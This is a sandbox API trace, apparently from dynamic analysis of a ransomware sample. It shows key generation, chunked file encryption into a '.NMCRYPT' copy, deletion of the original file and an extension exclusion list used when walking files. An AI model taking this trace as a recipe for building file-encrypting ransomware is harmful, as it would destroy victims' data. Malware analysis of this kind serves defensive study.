1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.476] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.477] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.477] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d0ac | out: phHash=0x60d0ac) returned 1 [0143.477] CryptHashData (hHash=0x8bdd38, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.477] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x8bdd38, dwFlags=0x4, phKey=0x60d0b0 | out: phKey=0x60d0b0*=0x8bdbf8) returned 1 [0143.477] CryptSetKeyParam (hKey=0x8bdbf8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.477] CryptSetKeyParam (hKey=0x8bdbf8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.477] wcslen (_String="\\\\?\\") returned 0x4 [0143.477] CryptDuplicateKey (in: hKey=0x8bdbf8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdb78) returned 1 [0143.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.479] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4782) returned 1 [0143.479] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.479] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.508] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.508] GetLastError () returned 0x0 [0143.508] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.513] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.513] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.513] GetLastError () returned 0x0 [0143.513] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.513] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.513] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.513] GetLastError () returned 0x0 [0143.513] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.514] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.514] GetLastError () returned 0x0 [0143.514] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.514] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.515] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.515] GetLastError () returned 0x0 [0143.515] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.515] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.516] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.516] GetLastError () returned 0x0 [0143.516] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.516] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.524] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.524] GetLastError () returned 0x0 [0143.524] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.524] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.524] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.524] GetLastError () returned 0x0 [0143.524] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.525] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0xae, lpOverlapped=0x0) returned 1 [0143.525] CryptEncrypt (in: hKey=0x8bdb78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0xae, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0xb0) returned 1 [0143.525] GetLastError () returned 0x0 [0143.525] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0xb0, lpOverlapped=0x0) returned 1 [0143.525] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.525] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.525] CloseHandle (hObject=0x5a0) returned 1 [0143.525] CloseHandle (hObject=0x588) returned 1 [0143.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 0x20 [0143.526] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", dwFileAttributes=0x20) returned 1 [0143.526] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 1 [0143.526] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0143.527] CryptDestroyKey (hKey=0x8bdb78) returned 1 [0143.527] wcslen (_String="OK") returned 0x2 [0143.527] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.527] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.527] CryptDestroyKey (hKey=0x8bdbf8) returned 1 [0143.527] CryptDestroyHash (hHash=0x8bdd38) returned 1 [0143.527] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0143.527] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*NMCRYPT") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*Recovers your files.html") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.exe") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.dll") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.lnk") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.bat") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.ini") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.msi") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*.scf") returned 0 [0143.527] PathMatchSpecW (pszFile="ServiceWatcherSchedule.xml", pszSpec="*pagefile.sys*") returned 0 